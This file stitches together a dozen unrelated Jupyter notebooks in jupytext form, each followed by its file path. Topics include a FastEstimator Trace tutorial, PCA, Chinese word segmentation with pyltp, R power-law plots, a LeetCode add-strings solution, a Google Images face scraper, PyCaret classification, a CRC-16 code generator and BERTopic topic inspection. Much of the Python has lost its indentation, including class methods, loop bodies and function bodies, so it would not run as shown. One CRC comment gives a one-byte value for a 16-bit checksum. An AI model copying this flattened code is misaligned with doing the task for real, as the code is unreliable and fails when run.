# ## Trace
# <a id='t07concept'></a>
# ### Concept
# Now you might be thinking: 'changing logging behavior and monitoring extra keys is cool, but where is the fine-grained access to the training loop?'
#
# The answer is `Trace`. `Trace` is a module that gives you access to different training stages and allows you to "do stuff" with them. Here are some examples of what a `Trace` can do:
#
# * print any training data at any training step
# * write results to a file during training
# * change learning rate based on some loss conditions
# * calculate any metrics
# * order you a pizza after training ends
# * ...
#
# So what are the different training stages? They are:
#
# * Beginning of training
# * Beginning of epoch
# * Beginning of batch
# * End of batch
# * End of epoch
# * End of training
#
# <img src="../resources/t07_trace_concept.png" alt="drawing" width="500"/>
#
# As we can see from the illustration above, the training process is essentially a nested combination of batch loops and epoch loops. Over the course of training, `Trace` places 6 different "road blocks" for you to leverage.
# <a id='t07structure'></a>
# ### Structure
# If you are familiar with Keras, you will notice that the structure of `Trace` is very similar to the Keras `Callback`. Despite the structural similarity, `Trace` gives you a lot more flexibility, which we will talk about in depth in [advanced tutorial 4](../advanced/t04_trace.ipynb). Implementation-wise, `Trace` is a python class with the following structure:
class Trace:
def __init__(self, inputs=None, outputs=None, mode=None):
self.inputs = inputs
self.outputs = outputs
self.mode = mode
def on_begin(self, data):
"""Runs once at the beginning of training"""
def on_epoch_begin(self, data):
"""Runs at the beginning of each epoch"""
def on_batch_begin(self, data):
"""Runs at the beginning of each batch"""
def on_batch_end(self, data):
"""Runs at the end of each batch"""
def on_epoch_end(self, data):
"""Runs at the end of each epoch"""
    def on_end(self, data):
        """Runs once at the end of training"""
# Given the structure, users can customize their own functions at different stages and insert them into the training loop. We will leave the customization of `Traces` to the advanced tutorial. For now, let's use some pre-built `Traces` from FastEstimator.
#
# During the training loop in our earlier example, we want 2 things to happen:
# 1. Save the model weights if the evaluation loss is the best we have seen so far
# 2. Calculate the model accuracy during evaluation
# <a id='t07usage'></a>
# +
from fastestimator.trace.io import BestModelSaver
from fastestimator.trace.metric import Accuracy
est = get_estimator(use_trace=True)
est.fit()
# -
# As we can see from the log, the model is saved in a predefined location and the accuracy is displayed during evaluation.
# <a id='t07testing'></a>
# ## Model Testing
#
# Sometimes you have a separate testing dataset in addition to your training and evaluation data. If you want to evaluate the model metrics on the test data, you can simply call:
est.test()
# This will feed all of your test dataset through the `Pipeline` and `Network`, and finally execute the traces (in our case, compute accuracy) just like during the training.
# <a id='t07apphub'></a>
# ## Apphub Examples
# You can find some practical examples of the concepts described here in the following FastEstimator Apphubs:
#
# * [UNet](../../apphub/semantic_segmentation/unet/unet.ipynb)
|
tutorial/beginner/t07_estimator.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Dimensionality reduction
# In this step, dimensionality reduction is performed before training the machine learning models.
import numpy as np
from sklearn.decomposition import PCA
from scipy import sparse
X_train_blc_sparse = sparse.load_npz('data_files/X_train_blc_sparse.npz')
type(X_train_blc_sparse)
X_train_balanced = X_train_blc_sparse.toarray()
type(X_train_balanced)
X_train_balanced.shape
# ## Decomposition with the PCA method
# The *principal component analysis (PCA)* method was applied to reduce the dimensionality of the training dataset, keeping enough components to explain 95% of the variance. (Note: `PCA` accepts a float `n_components` for this; `SparsePCA` does not.)
pca = PCA(n_components=0.95)
X_train_pca = pca.fit_transform(X_train_balanced)
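# The 95%-of-variance criterion can be reproduced directly with a numpy SVD — a sketch on synthetic data, independent of scikit-learn:

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 50))

# Center the data, then take the singular values of the data matrix
Xc = X - X.mean(axis=0)
s = np.linalg.svd(Xc, compute_uv=False)

# Explained-variance ratio per component, as PCA reports it
ratio = s**2 / np.sum(s**2)

# Smallest number of components whose cumulative ratio reaches 95%
k = int(np.searchsorted(np.cumsum(ratio), 0.95) + 1)
print(k, "components explain 95% of the variance")
```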
|
.ipynb_checkpoints/05-Reducao_dimensionalidade-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Example of using IIS
# ## Define a model to estimate
# +
from scipy.stats import norm, uniform
from iis import IIS, Model
def mymodel(params):
"""User-defined model with two parameters
Parameters
----------
params : numpy.ndarray 1-D
Returns
-------
state : float
return value (could also be an array)
"""
return params[0] + params[1]*2
likelihood = norm(loc=1, scale=1) # normal, univariate distribution mean 1, s.d. 1
prior = [norm(loc=0, scale=10), uniform(loc=-10, scale=20)]
model = Model(mymodel, likelihood, prior=prior) # define the model
# -
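# The toy model above is just a linear combination of its two parameters; a quick standalone check (re-defining the same function so the snippet is self-contained):

```python
import numpy as np

def mymodel(params):
    # same toy model as above: params[0] + 2 * params[1]
    return params[0] + params[1] * 2

state = mymodel(np.array([1.0, 2.0]))
print(state)  # 5.0
```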
# ## Estimate its parameters
solver = IIS(model)
ensemble = solver.estimate(size=500, maxiter=10)
# ## Investigate results
#
# The IIS class has two attributes of interest:
# - `ensemble` : current ensemble
# - `history` : list of previous ensembles
#
# And a `to_panel` method to visualize the data as a pandas Panel.
#
# The Ensemble class has the following attributes of interest:
# - `state` : 2-D ndarray (samples x state variables)
# - `params` : 2-D ndarray (samples x parameters)
# - `model` : the model defined above, with target distribution and forward integration functions
#
# For convenience, it is possible to extract these fields as a pandas DataFrame or Panel, combining `params` and `state`. See the in-line help for the methods `Ensemble.to_dataframe` and `IIS.to_panel`. This feature requires having
# `pandas` installed.
#
# Two plotting methods are also provided: `Ensemble.scatter_matrix` and `IIS.plot_history`.
# The first is simply a wrapper around pandas' function, but it is so frequently used that it is added
# as a method.
# Use pandas to check out the quantiles of the final ensemble
ensemble.to_dataframe().quantile([0.5, 0.05, 0.95])
# or the iteration history
solver.to_panel(quantiles=[0.5, 0.05, 0.95])
# ## Check convergence
# Plotting methods
# %matplotlib inline
solver.plot_history(overlay_dists=True)
# ## Scatter matrix to investigate final distributions and correlations
ensemble.scatter_matrix() # result
# ## Advanced visualization using pandas (classes)
#
# Pandas also ships with a few methods to investigate clusters in data.
# The `categories` keyword has been added to `Ensemble.to_dataframe` to automatically
# add a column with appropriate categories.
# +
from pandas.tools.plotting import parallel_coordinates, radviz, andrews_curves
import matplotlib.pyplot as plt
# create clusters of data
categories = []
for i in xrange(ensemble.size):
if ensemble.params[i,0]>0:
cat = 'p0 > 0'
elif ensemble.params[i,0] > -5:
cat = 'p0 < 0 and |p0| < 5'
else:
cat = 'rest'
categories.append(cat)
# Create a DataFrame with a category name
class_column = '_CatName'
df = ensemble.to_dataframe(categories=categories, class_column=class_column)
plt.figure()
parallel_coordinates(df, class_column)
plt.title("parallel_coordinates")
plt.figure()
radviz(df, class_column)
plt.title("radviz")
|
notebooks/examples.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
"""Shrink the triangulation of a mesh to make the inside visible."""
from vedo import *
embedWindow('ipyvtk') # or k3d or panel
pot = load(datadir+"teapot.vtk").shrink(0.75)
s = Sphere(r=0.2).pos(0, 0, -0.5)
plt = show(pot, s, viewup='z')
# -
plt.close()
|
examples/notebooks/basic/shrink.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
# -*- coding: utf-8 -*-
import os
LTP_DATA_DIR = '/Users/lipingzhang/Desktop/program/jd/jd_crm/jd_crm/data_prepare/ltp_data_v3.4.0/'  # path to the LTP model directory
cws_model_path = os.path.join(LTP_DATA_DIR, 'cws.model')  # word segmentation model path; the model is named `cws.model`
from pyltp import Segmentor
segmentor = Segmentor()  # initialize an instance
segmentor.load(cws_model_path)  # load the model
words = segmentor.segment('元芳你怎么看')  # segment the sentence into words
print '\t'.join(words)
segmentor.release()  # release the model
# -
# -*- coding: utf-8 -*-
from pyltp import SentenceSplitter
sents = SentenceSplitter.split('元芳你怎么看?我就趴窗口上看呗!')  # split into sentences
print '\n'.join(sents)
# +
# -*- coding: utf-8 -*-
import os
LTP_DATA_DIR = '/Users/lipingzhang/Desktop/program/jd/jd_crm/jd_crm/data_prepare/ltp_data_v3.4.0/'  # path to the LTP model directory
pos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model')  # part-of-speech tagging model path; the model is named `pos.model`
from pyltp import Postagger
postagger = Postagger()  # initialize an instance
postagger.load(pos_model_path)  # load the model
words = ['元芳', '你', '怎么', '看']  # word segmentation result
postags = postagger.postag(words)  # part-of-speech tagging
print '\t'.join(postags)
print list(postags)
postagger.release()  # release the model
# -
cs = "cosine_sim_|及时:包装,高:性价比"
c = cs[len("cosine_sim_|"):]
print c
|
other/Untitled15.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R
# language: R
# name: ir
# ---
# # Analysis example for exploring power law distributions
#
# In this notebook we explore power law distributions to gain familiarity with them.
#
# See https://www.nature.com/articles/srep00812 to recognize that mixtures of power laws do not, themselves, yield a power law! Also, if you take the bottom half of data from a power law, you will not get a power law.
#
# The original analysis is in github repo: https://github.com/carbocation/jupyter/blob/master/powerlaws.ipynb
# ## Setup
lapply(c('poweRlaw'),
function(pkg) { if(! pkg %in% installed.packages()) { install.packages(pkg)} } )
# +
GetRanks <- function(x) {
return(1+length(x)-seq(1, length(x)))
}
# Generate a vector with 50k power-law distributed values
# with scaling factor of 3, starting at 1
x <- poweRlaw::rpldis(50000, 1, 3, discrete_max=10000)
# -
# ## Plot the full distribution
(function() {
# Plot them. Note that the order (with regard to the rank of the x values) matters.
plot(GetRanks(x), sort(x), log="xy", xlab="Rank", ylab="Value", main="Log scale")
})()
# ## Take the bottom 95% of the distribution and see if it still looks like a power law (no)
(function() {
N <- 0.95*length(x)
#partials <- sort(x)[(length(x)-N):(length(x)-1)]
partials <- sort(x)[1:N]
plot(GetRanks(partials), sort(partials), log="xy", xlab="Rank", ylab="Value", main="Log scale")
})()
# ## Take the top 5% of the distribution and see if it still looks like a power law (yes)
(function() {
N <- 0.05*length(x)
partials <- sort(x)[(length(x)-N):(length(x)-1)]
plot(GetRanks(partials), sort(partials), log="xy", xlab="Rank", ylab="Value", main="Log scale")
})()
# # Provenance
devtools::session_info()
# Copyright 2018 The Broad Institute, Inc., Verily Life Sciences, LLC All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD license. See the LICENSE file for details.
|
terra-notebooks-playground/R - Analysis example for exploring power law distributions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
n_samples = 10000 #number of random samples to use
n_bins = 100 #number of bins for our histogram
sigma = 1.0 #rms width of the gaussian
mu = 0.0 #mean of the gaussian
x = np.random.normal(mu,sigma,n_samples)
print(x.min())
print(x.max())
def gaussian(x,mu,sigma):
return 1./(2.0*np.pi*sigma**2)**0.5 * np.exp(-0.5*((x-mu)/sigma)**2)
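# A quick numerical sanity check that the density above integrates to 1 (Riemann sum on a wide, fine grid; the function is re-defined so the snippet is self-contained):

```python
import numpy as np

def gaussian(x, mu, sigma):
    # same density as above
    return 1. / (2.0 * np.pi * sigma**2)**0.5 * np.exp(-0.5 * ((x - mu) / sigma)**2)

xx = np.linspace(-10.0, 10.0, 10001)
area = np.sum(gaussian(xx, 0.0, 1.0)) * (xx[1] - xx[0])
print(area)  # very close to 1.0
```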
fig = plt.figure(figsize=(7,7))
y_hist, x_hist, ignored = plt.hist(x, bins=n_bins, range=[-5,5], density=True)
xx = np.linspace(-5.0,5.0,1000)
plt.plot(xx,gaussian(xx,mu,sigma),color="red")
plt.ylim([0,0.5])
plt.xlim([-5,5])
plt.gca().set_aspect(20)
plt.xlabel('x')
plt.ylabel('y(x)')
plt.show()
|
simplegaussian.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Saturday, September 5, 2020
# ### leetCode - Add Strings (Python)
# ### Problem: https://leetcode.com/problems/add-strings/
# ### Blog: https://somjang.tistory.com/entry/leetCode-415-Add-Strings-Python
# ### First attempt
class Solution(object):
def addStrings(self, num1, num2):
answer_list = []
carry = 0
index1, index2 = len(num1), len(num2)
while index1 or index2 or carry:
digit = carry
if index1:
index1 -= 1
digit += int(num1[index1])
if index2:
index2 -= 1
digit += int(num2[index2])
carry = digit > 9
answer_list.append(str(digit % 10))
return ''.join(answer_list[::-1])
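# A standalone version of the same digit-by-digit approach, handy for quick sanity checks outside the LeetCode harness (`add_strings` is just the method above rewritten as a free function):

```python
def add_strings(num1, num2):
    """Add two non-negative integers given as strings, without converting whole inputs to int."""
    answer, carry = [], 0
    i, j = len(num1), len(num2)
    while i or j or carry:
        digit = carry
        if i:
            i -= 1
            digit += int(num1[i])
        if j:
            j -= 1
            digit += int(num2[j])
        carry = digit > 9  # True behaves as 1 in the next iteration
        answer.append(str(digit % 10))
    return ''.join(reversed(answer))

print(add_strings("456", "77"))  # 533
```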
|
DAY 101 ~ 200/DAY199_[leetCode] Add Strings (Python).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + colab={"base_uri": "https://localhost:8080/"} id="VIxtnx180jS9" executionInfo={"status": "ok", "timestamp": 1642319114763, "user_tz": 480, "elapsed": 17409, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}} outputId="73444e58-2fad-4d5a-8bcc-2ab60a67ae1a"
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
# + id="9FgJno7he4HY"
# # !rm -rf ./gdrive/MyDrive/Song4U/Face_Data/Unscreened_Data/Happy/
# # !rm -rf ./gdrive/MyDrive/Song4U/Face_Data/Data/Happy/
# # !rm -rf ./gdrive/MyDrive/Song4U/Face_Data/Past_Data/Happy/
# # !mkdir ./gdrive/MyDrive/Song4U/Face_Data/Unscreened_Data/Happy/
# # !mkdir ./gdrive/MyDrive/Song4U/Face_Data/Data/Happy/
# # !mkdir ./gdrive/MyDrive/Song4U/Face_Data/Past_Data/Happy/
# + id="k8wap5Gez478" executionInfo={"status": "ok", "timestamp": 1642319122091, "user_tz": 480, "elapsed": 684, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}}
# #%pip install bs4
import os
from bs4 import BeautifulSoup
import requests as req
import urllib
import pandas as pd
import cv2
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
import sys
#VERY IMPORTANT: Make sure to increment the number below by 1 before starting the scraping!!!!!
iteration = 50
# + id="ueOqQN-NKXyC" executionInfo={"status": "ok", "timestamp": 1642319122092, "user_tz": 480, "elapsed": 6, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}}
# from google.colab import drive
# drive.mount('/content/gdrive', force_remount=True)
# + id="j7AgoEnrwpZa" executionInfo={"status": "ok", "timestamp": 1642319124517, "user_tz": 480, "elapsed": 1702, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}}
my_lib_path = os.path.abspath('./gdrive/Shareddrives/RoseHack/')
sys.path.append(my_lib_path)
from landmarks import firstmodify, ifoverborder, finalmodify
net = cv2.dnn.readNetFromCaffe('./gdrive/Shareddrives/RoseHack/deploy.prototxt.txt', './gdrive/Shareddrives/RoseHack/res10_300x300_ssd_iter_140000.caffemodel')
# + id="6vwSQNIVtwFt"
key = "Happy"
# + id="h5a17L8rimoo"
def deep_convert(f, return_rectangle = False, save_img=False):
image = cv2.imread(f)
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detections = net.forward()
height, width, channels = image.shape
green = (0, 255, 0)
line_thick = round(height/120)
for i in range(0, detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > 0.3:
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
            coords = detections[0, 0, i, 3:7]  # avoid shadowing the builtin len
            if coords[3] < 1:
(startX, startY, endX, endY) = box.astype("int")
startX = max(startX, 0)
startY = max(startY, 0)
#print(startX, startY)
left, right, up, bottom = firstmodify(startX, endX, startY, endY)
#print("1",left, right, up, bottom)
left, right, up, bottom = ifoverborder(left, right, up, bottom, w, h)
#print("2",left, right, up, bottom)
left, right, up, bottom = finalmodify(left, right, up, bottom)
#print("3",left, right, up, bottom)
#print(left, right, up, bottom)
roi = image[up:bottom, left:right]
#roi = image[startY:endY, startX:endX]
roi_224 = cv2.resize(roi, (224,224), interpolation = cv2.INTER_AREA)
head, tail = os.path.split(f)
#cv2.rectangle(image, (left, up), (right, bottom), green, thickness=line_thick)
output_dir = './gdrive/Shareddrives/RoseHack/Face_Data/Data/' + key + "/" + str(iteration) + f.split("/")[-1]
print(output_dir)
cv2.imwrite(output_dir, roi_224)
#roi = cv2.resize(roi, (200,200), interpolation = cv2.INTER_AREA)
output = cv2.cvtColor(roi_224, cv2.COLOR_BGR2RGB)
temp_output = output/255.
return temp_output, output_dir
# + id="awCrSvrEfukb"
# + id="59OrqmZf0BAD"
search_words = ["cheerful faces"]
img_dir = "./gdrive/Shareddrives/RoseHack/Face_Data/Unscreened_Data/" + key + "/"
for s in range(len(search_words)):
#Sources with free photos
search_words[s] = "unsplash photos of " + search_words[s]
search_words.append("pexels photos of " + search_words[s])
search_words.append("pixabay photos of " + search_words[s])
search_words.append("freeimages photos of " + search_words[s])
# + [markdown] id="1RKHcQ5EfPhR"
#
# + id="BIpaknTx2C2P"
for word in search_words:
dir_path = img_dir + word.replace(" ","_")
urlKeyword = urllib.parse.quote((word))
url = "https://www.google.com/search?hl=jp&q=" + urlKeyword + "&btnG=Google+Search&tbs=0&safe=off&tbm=isch"
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15",}
r = urllib.request.Request(url=url, headers=headers)
page = urllib.request.urlopen(r)
html = page.read().decode("utf-8")
ht = BeautifulSoup(html, "html.parser")
elems = ht.findAll("img", {"class":"rg_i Q4LuWd"})
for li in range(len(elems)):
#i+=1
if str(elems[li]).find("https")!=-1:
if str(elems[li]).find("Unsplash")!=-1 or str(elems[li]).find("Pexels")!=-1 or str(elems[li]).find("Pixabay")!=-1:
ele = elems[li]
ele = str(ele).replace('"','').split('src=')
eledict = dict()
ele = ele[-1].split(" ")
imageURL = ele[0]
file_path = dir_path + str(li) + ".jpg"
try:
urllib.request.urlretrieve(imageURL, file_path)
img = Image.open(file_path).convert("RGB")
img.save(file_path)
if os.path.getsize(file_path)<130000:
#print(os.path.getsize(file_path))
img2 = Image.open(file_path)
new_img = img2.resize((2000,2000))
new_img.save(file_path)
except:
"Unable to download " + word + " image " + str(li)
# + id="QueMMvJlwI0X"
import tensorflow as tf
from tensorflow.keras.models import load_model
import shutil
import numpy as np
import random
import os
from tensorflow.keras.preprocessing.image import img_to_array, load_img
# + id="qufYseGAPvV-" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1642292255159, "user_tz": 480, "elapsed": 51442, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}} outputId="c86dad3f-6afd-4e9e-8603-e019cb4d9f49"
#categories = ["Crime", "Crime_Alert", "Emergency", "Medical", "Medical_Alert", "No_Action", "No_Emergency"]
source = "./gdrive/Shareddrives/RoseHack/Face_Data/Unscreened_Data/" + key + "/"
dest = "./gdrive/Shareddrives/RoseHack/Face_Data/Data/" + key + "/"
past = "./gdrive/Shareddrives/RoseHack/Face_Data/Past_Data/"
files0 = os.listdir(past)
files = os.listdir(source)
img_ref = []
for r in files0:
img_path = past + r
im = load_img(img_path, target_size=(224, 224), grayscale=False)
img_ref.append(im)
for f in files:
img_path = source + f
img = load_img(img_path, target_size=(224, 224), grayscale=False) # this is a PIL image
#Screening:
# match = 0
# for f0 in files0:
# img_path0 = fdir0 + f0
# img0 = load_img(img_path0, target_size=(224,224), grayscale=False)
# if (np.array(img) == np.array(img0)).all():
# match+=1
match = 0
f0 = 0
while match==0 and f0<len(img_ref):
if (np.array(img) == np.array(img_ref[f0])).all():
match+=1
f0+=1
if match<1:
#shutil.copy(img_path, past + f)
try:
img00, img_dir00 = deep_convert(img_path)
except:
print("Discard")
shutil.move(img_path, past + f)
print(dest + f)
else:
print("Repeat detected: Discarding image " + img_path)
os.remove(img_path)
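# The duplicate screen above is a linear scan that compares pixel arrays for exact equality. The same idea in a minimal numpy sketch (`is_duplicate` is an illustrative helper, not part of the scraping code):

```python
import numpy as np

def is_duplicate(img, refs):
    """Return True if img exactly matches any reference array."""
    return any(np.array_equal(img, r) for r in refs)

refs = [np.zeros((2, 2)), np.ones((2, 2))]
print(is_duplicate(np.ones((2, 2)), refs))      # True
print(is_duplicate(np.full((2, 2), 2.0), refs))  # False
```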
# + colab={"base_uri": "https://localhost:8080/"} id="PJM5E7O5g45M" executionInfo={"status": "ok", "timestamp": 1642297185665, "user_tz": 480, "elapsed": 259, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a/default-user=s64", "userId": "07771012108284971658"}} outputId="604e44c0-8cb8-422c-e4bf-39c52583e96a"
# !ls ./gdrive/Shareddrives/RoseHack/Face_Data/Data/Neither/ | wc -l
# + id="0OXS6kHwhBKz"
# happy = "./gdrive/Shareddrives/RoseHack/Face_Data/Data/Happy/"
# sad = "./gdrive/Shareddrives/RoseHack/Face_Data/Data/Sad/"
# files0 = os.listdir(happy)
# print(len(files0))
# for f in files0:
# if f in os.listdir(happy):
# img_path0 = happy + f
# img = load_img(img_path0, target_size=(224, 224), grayscale=False)
# files = os.listdir(happy)
# files.remove(f)
# match = False
# r = 0
# print(len(files))
# while r < len(files) and match==False:
# img_path = happy + files[r]
# try:
# im = load_img(img_path, target_size=(224, 224), grayscale=False)
# if (np.array(img) == np.array(im)).all():
# match = True
# print("Match")
# except:
# print("Failed")
# r+=1
# if match==True:
# os.remove(img_path)
# match = 0
# f0 = 0
# while match==0 and f0<len(img_ref):
# if (np.array(img) == np.array(img_ref[f0])).all():
# match+=1
# f0+=1
# if match>=1:
# + id="sTp5PZZ8Eom-"
#img_path
# + id="LUNRefX3Fcat"
# dir = "./gdrive/Shareddrives/RoseHack/Face_Data/Past_Data/Neither/"
# dest = "./gdrive/Shareddrives/RoseHack/Face_Data/Past_Data/"
# files = os.listdir(dir)
# for f in files:
# shutil.move(dir + f, dest + f)
# + id="Xe2D0HKORdXz"
|
Data/WebScraping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
column_names = ["sex", "length", "diameter", "height", "whole weight",
"shucked weight", "viscera weight", "shell weight", "rings"]
dataset = pd.read_csv("abalone.data", names=column_names)
print(dataset.shape)
dataset.head()
# +
data = dataset.sample(frac=0.9, random_state=786)
data_unseen = dataset.drop(data.index)
data.reset_index(drop=True, inplace=True)
data_unseen.reset_index(drop=True, inplace=True)
print('Data for Modeling: ' + str(data.shape))
print('Unseen Data For Predictions: ' + str(data_unseen.shape))
# -
from pycaret.classification import *
exp_mclf101 = setup(data = data, target = 'sex', session_id=123)
best = compare_models()
# Logistic Regression
lr = create_model('lr')
tuned_lr = tune_model(lr)
final_lr = finalize_model(tuned_lr)
predictions_lr = predict_model(final_lr, data=data_unseen)
sum(predictions_lr['Score'])/len(predictions_lr['Score'])
# Gradient Boosting Classifier
gbc = create_model('gbc')
tuned_gbc = tune_model(gbc)
predict_model(tuned_gbc);
final_gbc = finalize_model(tuned_gbc)
predictions_gbc = predict_model(final_gbc, data=data_unseen)
sum(predictions_gbc['Score'])/len(predictions_gbc['Score'])
# Random Forest Classifier
rf = create_model('rf')
tuned_rf = tune_model(rf)
predict_model(tuned_rf);
final_rf = finalize_model(tuned_rf)
predictions_rf = predict_model(final_rf, data=data_unseen)
sum(predictions_rf['Score'])/len(predictions_rf['Score'])
plot_model(tuned_lr, plot = 'confusion_matrix')
plot_model(tuned_gbc, plot = 'confusion_matrix')
plot_model(tuned_rf, plot = 'confusion_matrix')
plot_model(tuned_lr, plot='class_report')
plot_model(tuned_gbc, plot = 'class_report')
plot_model(tuned_rf, plot = 'class_report')
|
Project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## CRC Polynomial 0x9EB2
#
# \begin{equation*}
# P(x) = x^{16}+x^{15}+x^{12}+x^{11}+x^{10}+x^{9}+x^{7}+x^{5}+x^{4}+x^{1}
# \end{equation*}
# ```
# bits in polynomial
#
# 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
# 1 1 0 0 1 1 1 1 0 1 0 1 1 0 0 1 0
# --> 19EB2
# ```
#
#
# # Requirements
#
# * install crcmod
#
import crcmod
# ## construct crc-function
poly = 0x19eb2
initCrc = 0
rev = True
xorOut = 0
crc16fun = crcmod.mkCrcFun(poly=poly, initCrc=initCrc, rev=rev, xorOut=xorOut)
# ## example message
#
# Sequence missing: CRC output of 0x02 0x12 0xB1 0xB2 should be 0xC4
data = b'\x02\x12\xB1\xB2'
print(data)
check = crc16fun(data)
hex(check)
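# For reference, the same reflected CRC can be computed without crcmod. Below is a bit-by-bit sketch: because `rev=True` processes bits LSB-first, the polynomial is used in its bit-reversed form (0x9EB2 reversed over 16 bits is 0x4D79).

```python
REV_POLY = 0x4D79  # 0x9EB2 bit-reversed over 16 bits

def crc16_bitwise(data, init=0, xor_out=0):
    """Bit-reflected CRC-16 matching crcmod's rev=True convention."""
    crc = init
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ REV_POLY
            else:
                crc >>= 1
    return crc ^ xor_out

print(hex(crc16_bitwise(b'\x02\x12\xB1\xB2')))
```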
# ## Code Generation
crc16 = crcmod.Crc(poly=poly, initCrc=initCrc, rev=rev, xorOut=xorOut)
filename = "crc16function.c"
with open(filename, 'w') as fp:
crc16.generateCode(functionName="crc16", out=fp, dataType='uint8_t', crcType='uint16_t')
|
tools/crc/crc16-0x9eb2h.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.11 64-bit (''bertopic_explore'': conda)'
# name: python3
# ---
# # Qualitatitive topic evaluations
# This notebook is used for formatting the data for qualitative evaluations. This includes:
# - Inspecting the topic words
# - Inspecting representative documents
# - Coming up with good "titles" for the topics
#
# Notes on TweetEval:
# - 10 topics may be too much :((
# - Difficult to classify?
import pickle
import numpy as np
import pandas as pd
import re
from pprint import pprint
from typing import Dict, Tuple, List, Union
from bertopic import BERTopic
from pathlib import Path
# +
def read_pickle(file_path):
with open(file_path, "rb") as f:
return pickle.load(f)
def get_model_name(model_path: Path) -> str:
    return re.match(r"\w+-\w+-\d+", model_path.name).group()
def create_topic_dict(raw_topic_dict: Dict[int, Tuple[str, int]]) -> Dict[int, List[str]]:
return {k: [tup[0] for tup in lst] for k, lst in raw_topic_dict.items() if k!=-1}
def latest_full_topics(dr: Path) -> Path:
return list(dr.glob("*full_doc_topics_*.csv"))[-1]
# -
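# For instance, `create_topic_dict` drops the outlier topic (key -1) and keeps only the word from each (word, weight) tuple. A quick check with toy data (the helper is re-defined so the snippet is self-contained):

```python
from typing import Dict, List, Tuple

def create_topic_dict(raw_topic_dict: Dict[int, List[Tuple[str, float]]]) -> Dict[int, List[str]]:
    # same as above: drop topic -1, keep only the words
    return {k: [tup[0] for tup in lst] for k, lst in raw_topic_dict.items() if k != -1}

raw = {-1: [("noise", 0.9)], 0: [("cat", 0.5), ("dog", 0.3)], 1: [("rain", 0.4)]}
print(create_topic_dict(raw))  # {0: ['cat', 'dog'], 1: ['rain']}
```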
DATA_DIR = Path("../data")
MODEL_DIR = Path("../../ExplainlpTwitter/output")
model_path = ""
model = BERTopic.load(model_path)
# +
doc_topics = pd.read_csv(latest_full_topics(DATA_DIR), index_col=0)
doc_topics
topic_words = read_pickle(DATA_DIR / "tweeteval_topic_dict.pkl")
clean_tweets = pd.read_csv(DATA_DIR / "tweeteval_text.csv", usecols=["text"])
doc_topics = doc_topics.merge(clean_tweets, left_index=True, right_index=True)
# -
# ## Looking at topic words
topic_dict = create_topic_dict(topic_words)
pprint(topic_dict)
doc_topics.groupby("topic").size()
for top, words in topic_dict.items():
print(f"evaluating topic {top}")
pprint(f"{words = }")
print(f"examples for topic {top}")
example_tweets = doc_topics.loc[doc_topics["topic"] == top, "text"].sample(10, random_state=42).tolist()
print(example_tweets)
print("")
|
